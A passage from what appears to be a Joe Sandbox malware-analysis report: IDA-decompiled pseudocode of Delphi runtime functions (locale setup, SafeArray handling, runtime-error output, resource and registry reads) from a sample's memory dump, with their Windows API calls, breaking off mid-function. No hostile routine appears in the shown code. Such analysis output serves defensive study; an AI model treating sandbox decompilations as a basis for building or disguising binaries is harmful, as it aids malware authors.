    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401B4A), ref: 00401AD2
    • LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401B4A), ref: 00401B11
    • RtlLeaveCriticalSection.KERNEL32(004545C4,00401B51,00000000,00000000,00401B4A), ref: 00401B3A
    • RtlDeleteCriticalSection.KERNEL32(004545C4,00401B51,00000000,00000000,00401B4A), ref: 00401B44
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 72%
    			E0040B514(void* __ebx, void* __edx, void* __edi, void* __esi) {
    				char _v8;
    				char _v12;
    				char _v16;
    				char _v20;
    				char _v24;
    				char _v28;
    				char _v32;
    				char _v36;
    				char _v40;
    				char _v44;
    				char _v48;
    				char _v52;
    				char _v56;
    				char _v60;
    				char _v64;
    				char _v68;
    				void* _t104;
    				void* _t111;
    				void* _t133;
    				intOrPtr _t183;
    				intOrPtr _t193;
    				intOrPtr _t194;
    
    				_t191 = __esi;
    				_t190 = __edi;
    				_t193 = _t194;
    				_t133 = 8;
    				do {
    					_push(0);
    					_push(0);
    					_t133 = _t133 - 1;
    				} while (_t133 != 0);
    				_push(__ebx);
    				_push(_t193);
    				_push(0x40b7df);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t194;
    				E0040B3A0();
    				E00409E60(__ebx, __edi, __esi);
    				_t196 =  *0x454744;
    				if( *0x454744 != 0) {
    					E0040A038(__esi, _t196);
    				}
    				_t132 = GetThreadLocale();
    				E00409DB0(_t43, 0, 0x14,  &_v20);
    				E00403EDC(0x454678, _v20);
    				E00409DB0(_t43, 0x40b7f4, 0x1b,  &_v24);
    				 *0x45467c = E00407174(0x40b7f4, 0, _t196);
    				E00409DB0(_t132, 0x40b7f4, 0x1c,  &_v28);
    				 *0x45467d = E00407174(0x40b7f4, 0, _t196);
    				 *0x45467e = E00409DFC(_t132, 0x2c, 0xf);
    				 *0x45467f = E00409DFC(_t132, 0x2e, 0xe);
    				E00409DB0(_t132, 0x40b7f4, 0x19,  &_v32);
    				 *0x454680 = E00407174(0x40b7f4, 0, _t196);
    				 *0x454681 = E00409DFC(_t132, 0x2f, 0x1d);
    				E00409DB0(_t132, "m/d/yy", 0x1f,  &_v40);
    				E0040A0E8(_v40, _t132,  &_v36, _t190, _t191, _t196);
    				E00403EDC(0x454684, _v36);
    				E00409DB0(_t132, "mmmm d, yyyy", 0x20,  &_v48);
    				E0040A0E8(_v48, _t132,  &_v44, _t190, _t191, _t196);
    				E00403EDC(0x454688, _v44);
    				 *0x45468c = E00409DFC(_t132, 0x3a, 0x1e);
    				E00409DB0(_t132, 0x40b828, 0x28,  &_v52);
    				E00403EDC(0x454690, _v52);
    				E00409DB0(_t132, 0x40b834, 0x29,  &_v56);
    				E00403EDC(0x454694, _v56);
    				E00403E88( &_v12);
    				E00403E88( &_v16);
    				E00409DB0(_t132, 0x40b7f4, 0x25,  &_v60);
    				_t104 = E00407174(0x40b7f4, 0, _t196);
    				_t197 = _t104;
    				if(_t104 != 0) {
    					E00403F20( &_v8, 0x40b84c);
    				} else {
    					E00403F20( &_v8, 0x40b840);
    				}
    				E00409DB0(_t132, 0x40b7f4, 0x23,  &_v64);
    				_t111 = E00407174(0x40b7f4, 0, _t197);
    				_t198 = _t111;
    				if(_t111 == 0) {
    					E00409DB0(_t132, 0x40b7f4, 0x1005,  &_v68);
    					if(E00407174(0x40b7f4, 0, _t198) != 0) {
    						E00403F20( &_v12, 0x40b868);
    					} else {
    						E00403F20( &_v16, 0x40b858);
    					}
    				}
    				_push(_v12);
    				_push(_v8);
    				_push(":mm");
    				_push(_v16);
    				E00404208();
    				_push(_v12);
    				_push(_v8);
    				_push(":mm:ss");
    				_push(_v16);
    				E00404208();
    				 *0x454746 = E00409DFC(_t132, 0x2c, 0xc);
    				_pop(_t183);
    				 *[fs:eax] = _t183;
    				_push(E0040B7E6);
    				return E00403EAC( &_v68, 0x10);
    			}


























    APIs
      • Part of subcall function 0040B3A0: GetThreadLocale.KERNEL32 ref: 0040B3CA
      • Part of subcall function 0040B3A0: GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040B494
      • Part of subcall function 0040B3A0: GetSystemMetrics.USER32(0000004A), ref: 0040B4BF
      • Part of subcall function 0040B3A0: GetSystemMetrics.USER32(0000002A), ref: 0040B4D0
      • Part of subcall function 00409E60: GetThreadLocale.KERNEL32(00000000,00409F73,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409E7C
    • GetThreadLocale.KERNEL32(00000000,0040B7DF,?,?,00000000,00000000), ref: 0040B54A
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
      • Part of subcall function 00409DFC: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040B5C6,00000000,0040B7DF,?,?,00000000,00000000), ref: 00409E0F
      • Part of subcall function 0040A0E8: GetThreadLocale.KERNEL32(?,00000000,0040A2B2,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A117
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(?,00000000,0040A0CF,?,?,00000000), ref: 0040A050
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040A0CF,?,?,00000000), ref: 0040A080
      • Part of subcall function 0040A038: EnumCalendarInfoA.KERNEL32(Function_00009F84,00000000,00000000,00000004), ref: 0040A08B
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040A0CF,?,?,00000000), ref: 0040A0A9
      • Part of subcall function 0040A038: EnumCalendarInfoA.KERNEL32(Function_00009FC0,00000000,00000000,00000003), ref: 0040A0B4
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 77%
    			E0040DBC0(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
    				char _v260;
    				char _v768;
    				char _v772;
    				short* _v776;
    				intOrPtr _v780;
    				char _v784;
    				signed int _v788;
    				signed short* _v792;
    				char _v796;
    				char _v800;
    				intOrPtr* _v804;
    				void* __ebp;
    				signed char _t47;
    				signed int _t54;
    				void* _t62;
    				intOrPtr* _t73;
    				intOrPtr* _t91;
    				void* _t93;
    				void* _t95;
    				void* _t98;
    				void* _t99;
    				intOrPtr* _t108;
    				void* _t112;
    				intOrPtr _t113;
    				char* _t114;
    				void* _t115;
    
    				_t100 = __ecx;
    				_v780 = __ecx;
    				_t91 = __edx;
    				_v776 = __eax;
    				if(( *(__edx + 1) & 0x00000020) == 0) {
    					E0040D7EC(0x80070057);
    				}
    				_t47 =  *_t91;
    				if((_t47 & 0x00000fff) != 0xc) {
    					_push(_t91);
    					_push(_v776);
    					L0040C5A0();
    					return E0040D7EC(_v776);
    				} else {
    					if((_t47 & 0x00000040) == 0) {
    						_v792 =  *((intOrPtr*)(_t91 + 8));
    					} else {
    						_v792 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
    					}
    					_v788 =  *_v792 & 0x0000ffff;
    					_t93 = _v788 - 1;
    					if(_t93 < 0) {
    						L9:
    						_push( &_v772);
    						_t54 = _v788;
    						_push(_t54);
    						_push(0xc);
    						L0040C9F4();
    						_t113 = _t54;
    						if(_t113 == 0) {
    							E0040D544(_t100);
    						}
    						E0040DB18(_v776);
    						 *_v776 = 0x200c;
    						 *((intOrPtr*)(_v776 + 8)) = _t113;
    						_t95 = _v788 - 1;
    						if(_t95 < 0) {
    							L14:
    							_t97 = _v788 - 1;
    							if(E0040DB34(_v788 - 1, _t115) != 0) {
    								L0040CA0C();
    								E0040D7EC(_v792);
    								L0040CA0C();
    								E0040D7EC( &_v260);
    								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
    							}
    							_t62 = E0040DB64(_t97, _t115);
    						} else {
    							_t98 = _t95 + 1;
    							_t73 =  &_v768;
    							_t108 =  &_v260;
    							do {
    								 *_t108 =  *_t73;
    								_t108 = _t108 + 4;
    								_t73 = _t73 + 8;
    								_t98 = _t98 - 1;
    							} while (_t98 != 0);
    							do {
    								goto L14;
    							} while (_t62 != 0);
    							return _t62;
    						}
    					} else {
    						_t99 = _t93 + 1;
    						_t112 = 0;
    						_t114 =  &_v772;
    						do {
    							_v804 = _t114;
    							_push(_v804 + 4);
    							_t18 = _t112 + 1; // 0x1
    							_push(_v792);
    							L0040C9FC();
    							E0040D7EC(_v792);
    							_push( &_v784);
    							_t21 = _t112 + 1; // 0x1
    							_push(_v792);
    							L0040CA04();
    							E0040D7EC(_v792);
    							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
    							_t112 = _t112 + 1;
    							_t114 = _t114 + 8;
    							_t99 = _t99 - 1;
    						} while (_t99 != 0);
    						goto L9;
    					}
    				}
    			}






























    APIs
    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040DC59
    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040DC75
    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0040DCAE
    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040DD2B
    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0040DD44
    • VariantCopy.OLEAUT32(?), ref: 0040DD79
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00403C90(void* __ecx) {
    				long _v4;
    				int _t3;
    
    				if( *0x454044 == 0) {
    					if( *0x419030 == 0) {
    						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
    					}
    					return _t3;
    				} else {
    					if( *0x454218 == 0xd7b2 &&  *0x454220 > 0) {
    						 *0x454230();
    					}
    					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
    					return WriteFile(GetStdHandle(0xfffffff5), E00403D18, 2,  &_v4, 0);
    				}
    			}






    APIs
    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
    • GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
    • WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
    • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040B9A0() {
    				struct HINSTANCE__** _t2;
    				void* _t3;
    				struct HINSTANCE__** _t5;
    				struct HRSRC__* _t7;
    				struct HINSTANCE__** _t8;
    				intOrPtr* _t11;
    				intOrPtr* _t12;
    				struct HINSTANCE__* _t13;
    
    				_t2 =  *0x452f9c; // 0x45402c
    				if( *_t2 != 0) {
    					_t5 =  *0x452f9c; // 0x45402c
    					_t7 = FindResourceA( *_t5, "DVCLAL", 0xa);
    					_t8 =  *0x452f9c; // 0x45402c
    					return LoadResource( *_t8, _t7);
    				}
    				_t3 = 0;
    				_t11 =  *0x4530b8; // 0x419034
    				_t12 =  *_t11;
    				if(_t12 != 0) {
    					while(1) {
    						_t13 =  *(_t12 + 4);
    						_t3 = LoadResource(_t13, FindResourceA(_t13, "DVCLAL", 0xa));
    						if(_t3 != 0) {
    							goto L5;
    						}
    						_t12 =  *_t12;
    						if(_t12 != 0) {
    							continue;
    						}
    						goto L5;
    					}
    				}
    				L5:
    				return _t3;
    			}












    APIs
    • FindResourceA.KERNEL32(00400000,DVCLAL,0000000A), ref: 0040B9BC
    • LoadResource.KERNEL32(00400000,00000000,00400000,DVCLAL,0000000A,?,00416F00,00000000,0040BA1A,?,?,?,00416F00,00000000,0040BA89,004171A3), ref: 0040B9CA
    • FindResourceA.KERNEL32(?,DVCLAL,0000000A), ref: 0040B9EC
    • LoadResource.KERNEL32(?,00000000,?,00416F00,00000000,0040BA1A,?,?,?,00416F00,00000000,0040BA89,004171A3,00416F00,00000000,00417553), ref: 0040B9F3
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00405945(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
    				long _t11;
    				void* _t16;
    
    				_t16 = __ebx;
    				 *__edi =  *__edi + __ecx;
    				 *((intOrPtr*)(__eax - 0x4545b4)) =  *((intOrPtr*)(__eax - 0x4545b4)) + __eax - 0x4545b4;
    				 *0x419008 = 2;
    				 *0x454014 = 0x4011a8;
    				 *0x454018 = 0x4011b0;
    				 *0x454046 = 2;
    				 *0x454000 = E00404B04;
    				if(E00402F5C() != 0) {
    					_t3 = E00402F8C();
    				}
    				E00403050(_t3);
    				 *0x45404c = 0xd7b0;
    				 *0x454218 = 0xd7b0;
    				 *0x4543e4 = 0xd7b0;
    				 *0x45403c = GetCommandLineA();
    				 *0x454038 = E004012C0();
    				if((GetVersion() & 0x80000000) == 0x80000000) {
    					 *0x4545b8 = E0040587C(GetThreadLocale(), _t16, __eflags);
    				} else {
    					if((GetVersion() & 0x000000ff) <= 4) {
    						 *0x4545b8 = E0040587C(GetThreadLocale(), _t16, __eflags);
    					} else {
    						 *0x4545b8 = 3;
    					}
    				}
    				_t11 = GetCurrentThreadId();
    				 *0x454030 = _t11;
    				return _t11;
    			}






    APIs
      • Part of subcall function 00402F5C: GetKeyboardType.USER32(00000000), ref: 00402F61
      • Part of subcall function 00402F5C: GetKeyboardType.USER32(00000001), ref: 00402F6D
    • GetCommandLineA.KERNEL32 ref: 004059AB
      • Part of subcall function 004012C0: GetStartupInfoA.KERNEL32 ref: 004012CA
    • GetVersion.KERNEL32 ref: 004059BF
    • GetVersion.KERNEL32 ref: 004059D0
    • GetThreadLocale.KERNEL32 ref: 004059EC
    • GetThreadLocale.KERNEL32 ref: 004059FD
      • Part of subcall function 0040587C: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    • GetCurrentThreadId.KERNEL32 ref: 00405A0C
      • Part of subcall function 00402F8C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FAE
      • Part of subcall function 00402F8C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FE1
      • Part of subcall function 00402F8C: RegCloseKey.ADVAPI32(?,00403004,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FF7
    C-Code - Quality: 86%
    			E0040A980(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
    				char _v8;
    				struct _MEMORY_BASIC_INFORMATION _v36;
    				char _v297;
    				char _v304;
    				intOrPtr _v308;
    				char _v312;
    				char _v316;
    				char _v320;
    				intOrPtr _v324;
    				char _v328;
    				void* _v332;
    				char _v336;
    				char _v340;
    				char _v344;
    				char _v348;
    				intOrPtr _v352;
    				char _v356;
    				char _v360;
    				char _v364;
    				void* _v368;
    				char _v372;
    				intOrPtr _t52;
    				intOrPtr _t60;
    				intOrPtr _t82;
    				intOrPtr _t86;
    				intOrPtr _t89;
    				intOrPtr _t101;
    				void* _t108;
    				intOrPtr _t110;
    				void* _t113;
    
    				_t108 = __edi;
    				_v372 = 0;
    				_v336 = 0;
    				_v344 = 0;
    				_v340 = 0;
    				_v8 = 0;
    				_push(_t113);
    				_push(0x40ab3b);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t113 + 0xfffffe90;
    				_t89 =  *((intOrPtr*)(_a4 - 4));
    				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
    					_t52 =  *0x453064; // 0x405f58
    					E00405824(_t52,  &_v8);
    				} else {
    					_t86 =  *0x453120; // 0x405f50
    					E00405824(_t86,  &_v8);
    				}
    				_t110 =  *((intOrPtr*)(_t89 + 0x18));
    				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
    				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
    					_v368 =  *(_t89 + 0xc);
    					_v364 = 5;
    					_v360 = _v8;
    					_v356 = 0xb;
    					_v352 = _t110;
    					_v348 = 5;
    					_t60 =  *0x453068; // 0x405f00
    					E00405824(_t60,  &_v372);
    					E0040A5A8(_t89, _v372, 1, _t108, _t110, 2,  &_v368);
    				} else {
    					_v332 =  *(_t89 + 0xc);
    					_v328 = 5;
    					E004040F8( &_v340, 0x105,  &_v297);
    					E00407660(_v340,  &_v336);
    					_v324 = _v336;
    					_v320 = 0xb;
    					_v316 = _v8;
    					_v312 = 0xb;
    					_v308 = _t110;
    					_v304 = 5;
    					_t82 =  *0x4530a0; // 0x405ff8
    					E00405824(_t82,  &_v344);
    					E0040A5A8(_t89, _v344, 1, _t108, _t110, 3,  &_v332);
    				}
    				_pop(_t101);
    				 *[fs:eax] = _t101;
    				_push(E0040AB42);
    				E00403E88( &_v372);
    				E00403EAC( &_v344, 3);
    				return E00403E88( &_v8);
    			}

    APIs
      • Part of subcall function 00405824: LoadStringA.USER32(00000000,00010000,?,00000400), ref: 00405855
    • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040AB3B), ref: 0040A9EB
    • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040AB3B), ref: 0040AA0D
    C-Code - Quality: 100%
    			E0040A31C(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				char _v273;
    				char _v534;
    				char _v790;
    				struct _MEMORY_BASIC_INFORMATION _v820;
    				char _v824;
    				intOrPtr _v828;
    				char _v832;
    				intOrPtr _v836;
    				char _v840;
    				intOrPtr _v844;
    				char _v848;
    				char* _v852;
    				char _v856;
    				char _v860;
    				char _v1116;
    				void* __edi;
    				struct HINSTANCE__* _t40;
    				intOrPtr _t51;
    				struct HINSTANCE__* _t53;
    				void* _t69;
    				void* _t73;
    				intOrPtr _t74;
    				intOrPtr _t83;
    				intOrPtr _t86;
    				intOrPtr* _t87;
    				void* _t93;
    
    				_t93 = __fp0;
    				_v8 = __ecx;
    				_t73 = __edx;
    				_t87 = __eax;
    				VirtualQuery(__edx,  &_v820, 0x1c);
    				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
    					_t40 =  *0x454660; // 0x400000
    					GetModuleFileNameA(_t40,  &_v534, 0x105);
    					_v12 = E0040A310(_t73);
    				} else {
    					_v12 = _t73 - _v820.AllocationBase;
    				}
    				E0040778C( &_v273, 0x104, E0040B24C(0x5c) + 1);
    				_t74 = 0x40a49c;
    				_t86 = 0x40a49c;
    				_t83 =  *0x406188; // 0x4061d4
    				if(E004032A0(_t87, _t83) != 0) {
    					_t74 = E00404348( *((intOrPtr*)(_t87 + 4)));
    					_t69 = E00407764(_t74, 0x40a49c);
    					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
    						_t86 = 0x40a4a0;
    					}
    				}
    				_t51 =  *0x453108; // 0x405f28
    				_t16 = _t51 + 4; // 0xffe8
    				_t53 =  *0x454660; // 0x400000
    				LoadStringA(E00404DCC(_t53),  *_t16,  &_v790, 0x100);
    				E00403064( *_t87,  &_v1116);
    				_v860 =  &_v1116;
    				_v856 = 4;
    				_v852 =  &_v273;
    				_v848 = 6;
    				_v844 = _v12;
    				_v840 = 5;
    				_v836 = _t74;
    				_v832 = 6;
    				_v828 = _t86;
    				_v824 = 6;
    				E00407CAC(_v8,  &_v790, _a4, _t93, 4,  &_v860);
    				return E00407764(_v8, _t86);
    			}

    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
    • LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    C-Code - Quality: 100%
    			E0040A31A(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				char _v273;
    				char _v534;
    				char _v790;
    				struct _MEMORY_BASIC_INFORMATION _v820;
    				char _v824;
    				intOrPtr _v828;
    				char _v832;
    				intOrPtr _v836;
    				char _v840;
    				intOrPtr _v844;
    				char _v848;
    				char* _v852;
    				char _v856;
    				char _v860;
    				char _v1116;
    				void* __edi;
    				struct HINSTANCE__* _t40;
    				intOrPtr _t51;
    				struct HINSTANCE__* _t53;
    				void* _t69;
    				void* _t74;
    				intOrPtr _t75;
    				intOrPtr _t85;
    				intOrPtr _t89;
    				intOrPtr* _t92;
    				void* _t105;
    
    				_v8 = __ecx;
    				_t74 = __edx;
    				_t92 = __eax;
    				VirtualQuery(__edx,  &_v820, 0x1c);
    				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
    					_t40 =  *0x454660; // 0x400000
    					GetModuleFileNameA(_t40,  &_v534, 0x105);
    					_v12 = E0040A310(_t74);
    				} else {
    					_v12 = _t74 - _v820.AllocationBase;
    				}
    				E0040778C( &_v273, 0x104, E0040B24C(0x5c) + 1);
    				_t75 = 0x40a49c;
    				_t89 = 0x40a49c;
    				_t85 =  *0x406188; // 0x4061d4
    				if(E004032A0(_t92, _t85) != 0) {
    					_t75 = E00404348( *((intOrPtr*)(_t92 + 4)));
    					_t69 = E00407764(_t75, 0x40a49c);
    					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
    						_t89 = 0x40a4a0;
    					}
    				}
    				_t51 =  *0x453108; // 0x405f28
    				_t16 = _t51 + 4; // 0xffe8
    				_t53 =  *0x454660; // 0x400000
    				LoadStringA(E00404DCC(_t53),  *_t16,  &_v790, 0x100);
    				E00403064( *_t92,  &_v1116);
    				_v860 =  &_v1116;
    				_v856 = 4;
    				_v852 =  &_v273;
    				_v848 = 6;
    				_v844 = _v12;
    				_v840 = 5;
    				_v836 = _t75;
    				_v832 = 6;
    				_v828 = _t89;
    				_v824 = 6;
    				E00407CAC(_v8,  &_v790, _a4, _t105, 4,  &_v860);
    				return E00407764(_v8, _t89);
    			}

    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
    • LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    C-Code - Quality: 65%
    			E00402F8C() {
    				void* _v8;
    				char _v12;
    				int _v16;
    				signed short _t12;
    				signed short _t14;
    				intOrPtr _t27;
    				void* _t29;
    				void* _t31;
    				intOrPtr _t32;
    
    				_t29 = _t31;
    				_t32 = _t31 + 0xfffffff4;
    				_v12 =  *0x419020 & 0x0000ffff;
    				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
    					_t12 =  *0x419020; // 0x1332
    					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
    					 *0x419020 = _t14;
    					return _t14;
    				} else {
    					_push(_t29);
    					_push(E00402FFD);
    					_push( *[fs:eax]);
    					 *[fs:eax] = _t32;
    					_v16 = 4;
    					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
    					_pop(_t27);
    					 *[fs:eax] = _t27;
    					_push(0x403004);
    					return RegCloseKey(_v8);
    				}
    			}

    APIs
    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FAE
    • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FE1
    • RegCloseKey.ADVAPI32(?,00403004,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FF7
    C-Code - Quality: 64%
    			E0040A038(void* __esi, void* __eflags) {
    				char _v8;
    				intOrPtr* _t18;
    				intOrPtr _t26;
    				void* _t27;
    				long _t29;
    				intOrPtr _t32;
    				void* _t33;
    
    				_t33 = __eflags;
    				_push(0);
    				_push(_t32);
    				_push(0x40a0cf);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t32;
    				E00409DB0(GetThreadLocale(), 0x40a0e4, 0x100b,  &_v8);
    				_t29 = E00407174(0x40a0e4, 1, _t33);
    				if(_t29 + 0xfffffffd - 3 < 0) {
    					EnumCalendarInfoA(E00409F84, GetThreadLocale(), _t29, 4);
    					_t27 = 7;
    					_t18 = 0x454764;
    					do {
    						 *_t18 = 0xffffffff;
    						_t18 = _t18 + 4;
    						_t27 = _t27 - 1;
    					} while (_t27 != 0);
    					EnumCalendarInfoA(E00409FC0, GetThreadLocale(), _t29, 3);
    				}
    				_pop(_t26);
    				 *[fs:eax] = _t26;
    				_push(E0040A0D6);
    				return E00403E88( &_v8);
    			}

    APIs
    • GetThreadLocale.KERNEL32(?,00000000,0040A0CF,?,?,00000000), ref: 0040A050
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040A0CF,?,?,00000000), ref: 0040A080
    • EnumCalendarInfoA.KERNEL32(Function_00009F84,00000000,00000000,00000004), ref: 0040A08B
    • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040A0CF,?,?,00000000), ref: 0040A0A9
    • EnumCalendarInfoA.KERNEL32(Function_00009FC0,00000000,00000000,00000003), ref: 0040A0B4
    C-Code - Quality: 82%
    			E0040A0E8(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
    				intOrPtr _v8;
    				char _v12;
    				intOrPtr _v16;
    				char _v20;
    				char _v24;
    				void* _t41;
    				signed int _t45;
    				signed int _t47;
    				signed int _t49;
    				signed int _t51;
    				intOrPtr _t75;
    				void* _t76;
    				signed int _t77;
    				signed int _t83;
    				signed int _t92;
    				intOrPtr _t111;
    				void* _t122;
    				void* _t124;
    				intOrPtr _t127;
    				void* _t128;
    
    				_t128 = __eflags;
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(0);
    				_t122 = __edx;
    				_t124 = __eax;
    				_push(_t127);
    				_push(0x40a2b2);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t127;
    				_t92 = 1;
    				E00403E88(__edx);
    				E00409DB0(GetThreadLocale(), 0x40a2c8, 0x1009,  &_v12);
    				if(E00407174(0x40a2c8, 1, _t128) + 0xfffffffd - 3 < 0) {
    					while(1) {
    						_t41 = E00404148(_t124);
    						__eflags = _t92 - _t41;
    						if(_t92 > _t41) {
    							goto L28;
    						}
    						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
    						asm("bt [0x419108], eax");
    						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
    							_t45 = E004077C0(_t124 + _t92 - 1, 2, 0x40a2cc);
    							__eflags = _t45;
    							if(_t45 != 0) {
    								_t47 = E004077C0(_t124 + _t92 - 1, 4, 0x40a2dc);
    								__eflags = _t47;
    								if(_t47 != 0) {
    									_t49 = E004077C0(_t124 + _t92 - 1, 2, 0x40a2f4);
    									__eflags = _t49;
    									if(_t49 != 0) {
    										_t51 =  *(_t124 + _t92 - 1) - 0x59;
    										__eflags = _t51;
    										if(_t51 == 0) {
    											L24:
    											E00404150(_t122, 0x40a30c);
    										} else {
    											__eflags = _t51 != 0x20;
    											if(_t51 != 0x20) {
    												E00404070();
    												E00404150(_t122, _v24);
    											} else {
    												goto L24;
    											}
    										}
    									} else {
    										E00404150(_t122, 0x40a300);
    										_t92 = _t92 + 1;
    									}
    								} else {
    									E00404150(_t122, 0x40a2ec);
    									_t92 = _t92 + 3;
    								}
    							} else {
    								E00404150(_t122, 0x40a2d8);
    								_t92 = _t92 + 1;
    							}
    							_t92 = _t92 + 1;
    							__eflags = _t92;
    						} else {
    							_v8 = E0040B04C(_t124, _t92);
    							E004043A8(_t124, _v8, _t92,  &_v20);
    							E00404150(_t122, _v20);
    							_t92 = _t92 + _v8;
    						}
    					}
    				} else {
    					_t75 =  *0x45473c; // 0x9
    					_t76 = _t75 - 4;
    					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
    						_t77 = 1;
    					} else {
    						_t77 = 0;
    					}
    					if(_t77 == 0) {
